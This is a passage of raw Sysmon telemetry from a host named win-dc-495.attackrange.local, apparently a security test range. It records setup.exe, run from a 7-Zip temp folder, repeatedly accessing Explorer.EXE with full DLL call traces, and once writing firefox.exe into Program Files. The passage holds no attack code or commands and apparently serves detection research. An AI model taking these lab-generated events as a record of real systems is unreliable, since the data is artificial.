torage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\firefox.exe2021-01-18 13:59:52.317 10341000x800000000000000014789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 